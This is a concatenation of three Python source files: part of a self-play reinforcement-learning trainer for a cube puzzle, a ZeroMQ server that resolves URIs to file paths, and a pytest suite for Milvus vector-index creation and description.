self_play_stats_df = pd.DataFrame(data=self.self_play_stats)
self_play_stats_df.to_hdf(path, 'self_play_stats', mode='a', format='fixed') #use mode='a' to avoid overwriting
print("saved stats:", "'" + path + "'")
def save_training_data(self):
# save training_data
import h5py
file_name = "data_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
inputs, outputs_policy, outputs_value = \
self.best_model.preprocess_training_data(self.training_data_states,
self.training_data_policies,
self.training_data_values)
if self.validate_training_data:
print("validating data...")
self.best_model.validate_data(inputs, outputs_policy, outputs_value, gamma=self.decay)
print("data valid.")
with h5py.File(path, 'w') as hf:
hf.create_dataset("inputs", data=inputs)
hf.create_dataset("outputs_policy", data=outputs_policy)
hf.create_dataset("outputs_value", data=outputs_value)
print("saved data:", "'" + path + "'")
@staticmethod
def random_state(distance, history):
state = State(history = history)
while state.done():
state.reset_and_randomize(distance)
return state
@staticmethod
def random_distance(distance_level):
lower_dist = int(distance_level)
prob_of_increase = distance_level - lower_dist
distance = lower_dist + np.random.choice(2, p=[1-prob_of_increase, prob_of_increase])
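        # e.g. a distance_level of 2.3 yields distance 2 with probability 0.7
        # and 3 with probability 0.3 (stochastic rounding)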
return distance
def update_win_and_level(self, distance, win, checkpoint=False):
if checkpoint:
training_distance_level = self.checkpoint_training_distance_level
recent_wins = self.checkpoint_recent_wins
recent_games = self.checkpoint_recent_games
else:
training_distance_level = self.training_distance_level
recent_wins = self.recent_wins
recent_games = self.recent_games
# update wins/loses
recent_wins[distance] += win
recent_games[distance] += 1
# update difficulty
upper_dist = 0
while True:
upper_dist += 1
if recent_wins[upper_dist] <= self.win_rate_target * recent_games[upper_dist]:
break
if upper_dist <= self.min_distance:
training_distance_level = float(self.min_distance)
else:
lower_dist = upper_dist - 1
lower_dist_win_rate = (.99 * self.win_rate_target) if recent_games[lower_dist] == 0 \
else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = (.99 * self.win_rate_target) if recent_games[lower_dist+1] == 0 \
else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
# notice that we won't divide by zero here since upper_dist_win_rate < lower_dist_win_rate
training_distance_level = lower_dist + (lower_dist_win_rate - self.win_rate_target) / (lower_dist_win_rate - upper_dist_win_rate)
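            # worked example (illustrative): with a 0.5 win-rate target, a 0.8
            # win rate at distance 3 and 0.2 at distance 4 give a level of
            # 3 + (0.8 - 0.5) / (0.8 - 0.2) = 3.5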
if checkpoint:
self.checkpoint_training_distance_level = training_distance_level
else:
self.training_distance_level = training_distance_level
def print_game_stats(self, game_results):
game_id = game_results.game_id
distance = game_results.distance
level = game_results.distance_level
win = game_results.win
steps = game_results.game_stats['total_steps'][0]
lost_way = game_results.self_play_stats['shortest_path'][0] < 0
print("\nGame {}/{}".format(game_id, self.games_per_generation))
print("distance: {} (level: {:.2f})".format(distance, level))
if win:
print("win ({}{} steps)".format(steps, "*" if lost_way else ""))
else:
print("loss")
print()
new_level = self.training_distance_level
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if self.recent_games[lower_dist] == 0 else self.recent_wins[lower_dist] / self.recent_games[lower_dist]
upper_dist_win_rate = float('nan') if self.recent_games[lower_dist+1] == 0 else self.recent_wins[lower_dist+1] / self.recent_games[lower_dist+1]
print("(DB) new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
print(end="", flush=True) # force stdout to flush (fixes buffering issues)
def print_eval_game_stats(self, game_results1, game_results2, current_scores):
game_id1 = game_results1.game_id
game_id2 = game_results2.game_id
distance1 = game_results1.distance
distance2 = game_results2.distance
level1 = game_results1.distance_level
level2 = game_results2.distance_level
win1 = game_results1.win
win2 = game_results2.win
steps1 = game_results1.game_stats['total_steps'][0]
steps2 = game_results2.game_stats['total_steps'][0]
lost_way1 = game_results1.self_play_stats['shortest_path'][0] < 0
lost_way2 = game_results2.self_play_stats['shortest_path'][0] < 0
assert game_id1 == game_id2
assert distance1 == distance2
print("\nEvaluation Game {}/{}".format(game_id1, self.games_per_evaluation))
print("distance: {} (levels: {:.2f} {:.2f})".format(distance1, level1, level2))
if win1:
print("best model: win ({}{} steps)".format(steps1, "*" if lost_way1 else ""))
else:
print("best model: loss")
if win2:
print("checkpoint model: win ({}{} steps)".format(steps2, "*" if lost_way2 else ""))
else:
print("checkpoint model: loss")
print()
new_level = self.training_distance_level
recent_games = self.recent_games
recent_wins = self.recent_wins
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if recent_games[lower_dist] == 0 else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = float('nan') if recent_games[lower_dist+1] == 0 else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
print("(DB) best model new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
new_level = self.checkpoint_training_distance_level
recent_games = self.checkpoint_recent_games
recent_wins = self.checkpoint_recent_wins
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if recent_games[lower_dist] == 0 else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = float('nan') if recent_games[lower_dist+1] == 0 else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
print("(DB) checkpoint new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
print(end="", flush=True) # force stdout to flush (fixes buffering issues)
def state_generator(self, max_game_id, evaluation=False):
while self.game_number < max_game_id:
if evaluation:
distance_level = max(self.training_distance_level, self.checkpoint_training_distance_level)
else:
distance_level = self.training_distance_level
distance = self.random_distance(distance_level)
state = self.random_state(distance, self.prev_state_history)
print("(DB)", "starting game", self.game_number, "...")
yield self.game_number, state, distance, distance_level
self.game_number += 1
def game_generator(self, model, state_generator, max_batch_size, return_in_order):
"""
        Send games to the batch game agent and retrieve the finished games.
        Yield finished games in consecutive order of their id when
        return_in_order is set; otherwise yield them as they finish.
"""
import heapq
finished_games = [] # priority queue
batch_game_agent = BatchGameAgent(model=model,
max_steps=self.max_steps,
max_depth=self.max_depth,
max_game_length=self.max_game_length,
transposition_table=self.prebuilt_transposition_table,
decay=self.decay,
exploration=self.exploration)
        # start with a batch size of 1 for roughly the first 16 games so the
        # early results give a better estimate of the distance level, then
        # scale up to the full batch size
batch_size = 1
cnt = 16
        # attach initial batch
first_batch = list(itertools.islice(state_generator, batch_size))
if not first_batch:
return
batch_game_agent.append_states(first_batch)
next_game_id = first_batch[0][0] # game_id is first element
# loop until all done
while not batch_game_agent.is_empty():
if self.multithreaded:
batch_game_agent.run_one_step_with_threading()
else:
batch_game_agent.run_one_step()
# collect all finished games
for game_results in batch_game_agent.finished_game_results():
heapq.heappush(finished_games, (game_results.game_id, game_results))
# check if available slots
if len(batch_game_agent.game_agents) < batch_size:
# increment batch size
cnt -= 1
if cnt < 0:
batch_size = max_batch_size
if return_in_order:
# return those which are next in order
if not finished_games or finished_games[0][1].game_id != next_game_id:
print("(DB)", "waiting on game", next_game_id, "(finished games:", ",".join(str(g[1].game_id) for g in finished_games), ") ...")
while finished_games and finished_games[0][1].game_id == next_game_id:
yield heapq.heappop(finished_games)[1]
next_game_id += 1
else:
# return in order they are finished
if not finished_games:
print("(DB) ...")
while finished_games:
yield heapq.heappop(finished_games)[1]
# fill up the batch (do after yields to ensure that self.training_distance_level is updated)
available_slots = batch_size - len(batch_game_agent.game_agents)
replacement_batch = itertools.islice(state_generator, available_slots)
batch_game_agent.append_states(replacement_batch)
def generate_data_self_play(self):
# don't reset self_play since using the evaluation results to also get data
#self.reset_self_play()
for game_results in self.game_generator(self.best_model, self.state_generator(self.games_per_generation), max_batch_size=self.batch_size, return_in_order=False):
# update data
for k, v in game_results.self_play_stats.items():
self.self_play_stats[k] += v
for k, v in game_results.game_stats.items():
self.game_stats[k] += v
self.training_data_states += game_results.data_states
self.training_data_policies += game_results.data_policies
self.training_data_values += game_results.data_values
# update win rates and level
self.update_win_and_level(game_results.distance, game_results.win)
# Print details
self.print_game_stats(game_results)
def evaluate_and_choose_best_model(self):
self.reset_self_play()
state_generator1, state_generator2 = itertools.tee(self.state_generator(self.games_per_evaluation, evaluation=True))
best_model_wins = 0
checkpoint_model_wins = 0
ties = 0
for game_results1, game_results2 \
in zip(self.game_generator(self.best_model, state_generator1, max_batch_size=self.batch_size, return_in_order=True),
self.game_generator(self.checkpoint_model, state_generator2, max_batch_size=self.batch_size, return_in_order=True)):
if game_results1.win > game_results2.win:
best_model_wins += 1
game_results = game_results1
elif game_results1.win < game_results2.win:
checkpoint_model_wins += 1
game_results = game_results2
else:
ties += 1
game_results = game_results1
# update data
for k, v in game_results.self_play_stats.items():
self.self_play_stats[k] += v
for k, v in game_results.game_stats.items():
self.game_stats[k] += v
self.training_data_states += game_results.data_states
self.training_data_policies += game_results.data_policies
self.training_data_values += game_results.data_values
# update win rates and level
self.update_win_and_level(game_results1.distance, game_results1.win)
self.update_win_and_level(game_results2.distance, game_results2.win, checkpoint=True)
# Print details
self.print_eval_game_stats(game_results1, game_results2, [best_model_wins, checkpoint_model_wins, ties])
print("\nEvaluation results (win/lose/tie)")
print("Best model : {:2} / {:2} / {:2}".format(best_model_wins, checkpoint_model_wins, ties))
print("Checkpoint model: {:2} / {:2} / {:2}".format(checkpoint_model_wins, best_model_wins, ties))
if checkpoint_model_wins - best_model_wins > 5:
print("\nCheckpoint model is better.")
print("\nSave and set as best model...")
self.save_and_set_best_model()
else:
print("\nCurrent best model is still the best.")
def main():
agent = TrainingAgent()
print("Build models...")
agent.build_models()
print("\nLoad pre-built transposition table...")
agent.load_transposition_table()
print("\nLoad models (if any)...")
agent.load_models()
print("\nBegin training loop...")
agent.reset_self_play()
tr.print_diff()
while True:
gc.collect()
print("BBB1", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nBegin self-play data generation...")
agent.generate_data_self_play()
gc.collect()
print("BBB2", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave stats...")
agent.save_training_stats()
gc.collect()
print("BBB3", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave data...")
agent.save_training_data()
agent.generation += 1
gc.collect()
print("BBB4", "objgraph stuff")
objgraph.show_growth(limit=50)
tr.print_diff()
"""
print()
for typename in sorted(['MCTSAgent', 'GameAgent', 'BatchAgent', 'TrainingAgent', 'BatchCube', 'State', 'MCTSNode', 'ConvModel2D3D', 'Task', 'BaseModel']):
cnt = objgraph.count(typename=typename)
print(typename, cnt)
if cnt:
obj = objgraph.by_type(typename=typename)[-1]
chain = objgraph.find_backref_chain(obj, predicate=lambda x: x is agent)
chain_types = [type(x) for x in chain]
pprint(chain_types)
#objgraph.show_refs([agent], filename='sample-graph'+str(agent.generation)+'.png')
"""
print("\nTrain model...")
agent.train_model()
gc.collect()
print("BBB5", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave model...")
agent.save_checkpoint_model()
gc.collect()
print("BBB5", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nBegin evaluation...")
agent.evaluate_and_choose_best_model()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print("\nExiting the program...\nGood bye!")
finally:
pass
|
turret-server.py
|
#
# Copyright 2019 University of Technology, Sydney
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# * The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import time
import logging
import sys
import threading
import traceback
import tempfile
from optparse import OptionParser
import zmq
from turret import resolver
TURRET_LOG_LOCATION = tempfile.mkdtemp(suffix='_turret_log')
ZMQ_WORKERS = 16
ZMQ_PORT = 5555
ZMQ_URL = "tcp://*:%s" % ZMQ_PORT
SERVER_RUNNING = False
WORKER_URL = "inproc://workers"
SHOULD_LOG = True
DEBUG_LOG = False
LOGGER = None
class turret_server_exception(Exception):
"""
"""
pass
def get_logger():
"""
Returns:
Python logger
"""
try:
os.makedirs(TURRET_LOG_LOCATION)
except OSError:
pass
localtime = time.localtime()
log_prefix = time.strftime('%d_%b_%Y_%H_%M_%S', localtime)
log_path = '%s/%s_turretServer.log' % (TURRET_LOG_LOCATION, log_prefix)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('turret-server')
logger.setLevel(logging.INFO)
handler = logging.FileHandler(log_path)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(formatter)
logger.addHandler(console)
return logger
def process_socket(a_socket, workerIdx=0):
"""
Args:
        a_socket: ZMQ REP socket on which resolve requests are received
        workerIdx: index of the worker thread (currently unused)
Returns:
None
Raises:
turret_server_exception
"""
# Wait until worker has message to resolve
while True:
try:
message = a_socket.recv()
except zmq.ZMQError, e:
if e.errno == zmq.EAGAIN:
pass
else:
raise e
else:
filepath = ""
if "KILL" in message:
a_socket.send("RECEIVED")
raise turret_server_exception("Server received kill instruction")
for retry in range(0, 10):
try:
filepath = resolver.uri_to_filepath(message)
                    if filepath is None:
continue
break
except Exception as e:
filepath = ''
LOGGER.info(str(e))
continue
# Send back resolved path
filepath += '\0'
a_socket.send(filepath)
LOGGER.info("received: %s\nsent: %s\n" % (message, filepath))
def worker_handle(workerURL, workerIdx, context=None):
"""
Args:
        workerURL: inproc endpoint the worker REP socket connects to
        workerIdx: index of the worker thread, passed through to process_socket
        context: optional shared zmq.Context (defaults to the global instance)
Returns:
"""
# Get ref to specified context
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(workerURL)
LOGGER.info("Started worker thread")
try:
while True:
process_socket(socket, workerIdx)
except turret_server_exception as e:
raise e
except Exception as e:
LOGGER.info("Caught exception: [%s]" % e)
LOGGER.info(traceback.format_exc())
raise
LOGGER.info("Caught exception: [%s]" % e)
LOGGER.info(traceback.format_exc())
LOGGER.info("Worker thread has stopped")
def worker_routine(workerURL, workerIdx, context=None):
"""
Args:
workerURL:
workerIdx:
context:
Returns:
"""
while True:
worker_handle(workerURL, workerIdx, context)
def launch_threaded_server():
"""
Returns:
"""
LOGGER.info("Launching threaded server")
# Create ZMQ context
context = zmq.Context.instance()
# Socket to talk to resolver clients
try:
clients = context.socket(zmq.ROUTER)
clients.bind(ZMQ_URL)
# Socket to talk to workers
workers = context.socket(zmq.DEALER)
workers.bind(WORKER_URL)
# Launch pool of workers
for i in range(ZMQ_WORKERS):
thread = threading.Thread(target=worker_routine, args=(WORKER_URL, i,))
thread.start()
LOGGER.info("Open server with %s workers." % ZMQ_WORKERS)
# Link clients and workers
zmq.proxy(clients, workers)
except zmq.error.ZMQError:
        # Address already in use
        raise turret_server_exception("ZMQ Server address already in use.")
except turret_server_exception as e:
print "pepe"
# Cleanup
clients.close()
workers.close()
context.term()
LOGGER.info("Closed server.")
raise turret_server_exception(e)
except KeyboardInterrupt:
# Cleanup
clients.close()
workers.close()
context.term()
LOGGER.info("Closed server.")
raise turret_server_exception("Keyboard has interrupted server.")
def launch_simple_server():
"""
Returns:
"""
LOGGER.info("Launching simple server")
# Create ZMQ context
context = zmq.Context()
context.setsockopt(zmq.RCVHWM, 5000000)
context.setsockopt(zmq.SNDHWM, 5000000)
context.setsockopt(zmq.SNDTIMEO, 50000)
context.setsockopt(zmq.RCVTIMEO, 50000)
while True:
socket = context.socket(zmq.REP)
try:
socket.bind(ZMQ_URL)
except zmq.error.ZMQError:
raise turret_server_exception("ZMQ Server address already in use.")
# Listen for client requests
try:
process_socket(socket)
except KeyboardInterrupt:
raise turret_server_exception("Keyboard has interrupted server.")
except turret_server_exception as e:
raise turret_server_exception(e)
except Exception as e:
print("Caught exception:", e)
finally:
socket.unbind(ZMQ_URL)
socket.close()
# Handle server loop to restart when failure
def start_server_manager(isThreaded):
"""
Args:
        isThreaded: if True, run the multi-worker ZMQ proxy server; otherwise run the single-socket server
Returns:
"""
try:
while True:
if isThreaded:
# this will perform SG authentication, to avoid all threads trying to do it in parallel
# resolver.authenticate()
launch_threaded_server()
else:
launch_simple_server()
except turret_server_exception as e:
print("Server manager has caught exception: [%s]" % str(e))
def main():
p = OptionParser(usage="%prog arg1 [options]")
p.add_option("-t", "--threaded", dest="threaded", default=False, action="store_true")
(opts, args) = p.parse_args(sys.argv[1:])
global LOGGER
LOGGER = get_logger()
start_server_manager(opts.threaded)
if __name__ == "__main__":
main()
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
nb = 6000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 300
nprobe = 1
tag = "1970-01-01"
NLIST = 4046
INVALID_NLIST = 100000000
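# Illustrative sketch (not part of the original suite): the index lifecycle these tests
# exercise with the pre-1.0 Milvus SDK -- add vectors, build an index, inspect it, then drop
# it. `connect` and `collection` stand in for the fixtures the test classes below receive.
def _index_lifecycle_example(connect, collection):
    status, ids = connect.add_vectors(collection, vectors)
    assert status.OK()
    status = connect.create_index(collection, IndexType.IVF_SQ8, {"nlist": NLIST})
    assert status.OK()
    status, index_info = connect.describe_index(collection)
    logging.getLogger().info(index_info)
    status = connect.drop_index(collection)
    assert status.OK()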
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
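    # The two fixtures above skip parameter combinations the server cannot build:
    # IVF_SQ8H when the server runs in CPU mode, and IVF_PQ when it runs in GPU mode.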
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
connect.flush()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_multithread_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
threads_num = 8
loop_num = 8
threads = []
collection = []
j = 0
while j < (threads_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*loop_num+i])
                status, ids = connect.add_vectors(collection[idx*loop_num+i], vectors)
                status = connect.create_index(collection[idx*loop_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*loop_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
        for i in range(threads_num):
            m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
            t = threading.Thread(target=create_index, args=(m, i))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_a_multithreads(self, connect, collection, args):
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
def count(connect):
status, count = connect.count_collection(collection)
assert status.OK()
assert count == nb
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
            if i % 2 == 0:
p = threading.Thread(target=build, args=(m,))
else:
p = threading.Thread(target=count, args=(m,))
threads.append(p)
p.start()
time.sleep(0.2)
for p in threads:
p.join()
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
for i in range(process_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*loop_num+i])
                status, ids = connect.add_vectors(collection[idx*loop_num+i], vectors)
                status = connect.create_index(collection[idx*loop_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*loop_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
        for i in range(process_num):
            m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
            p = Process(target=create_index, args=(m, i))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_collection_not_existed(self, connect):
'''
target: test create index interface when collection name not existed
        method: create index using a collection name that has not been created
expected: return code not equals to 0, create index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, index_type, index_param)
assert not status.OK()
def test_create_index_collection_None(self, connect):
'''
target: test create index interface when collection name is None
        method: create collection and add vectors in it, create index with a collection_name of None
expected: return code not equals to 0, create index failed
'''
collection_name = None
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(collection_name, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
        method: create index after the index has been built
expected: return code success, and search ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after the index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
assert result._params["nlist"] == nlist
assert result._collection_name == collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, collection, get_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
if status.OK():
status, result = connect.describe_index(collection)
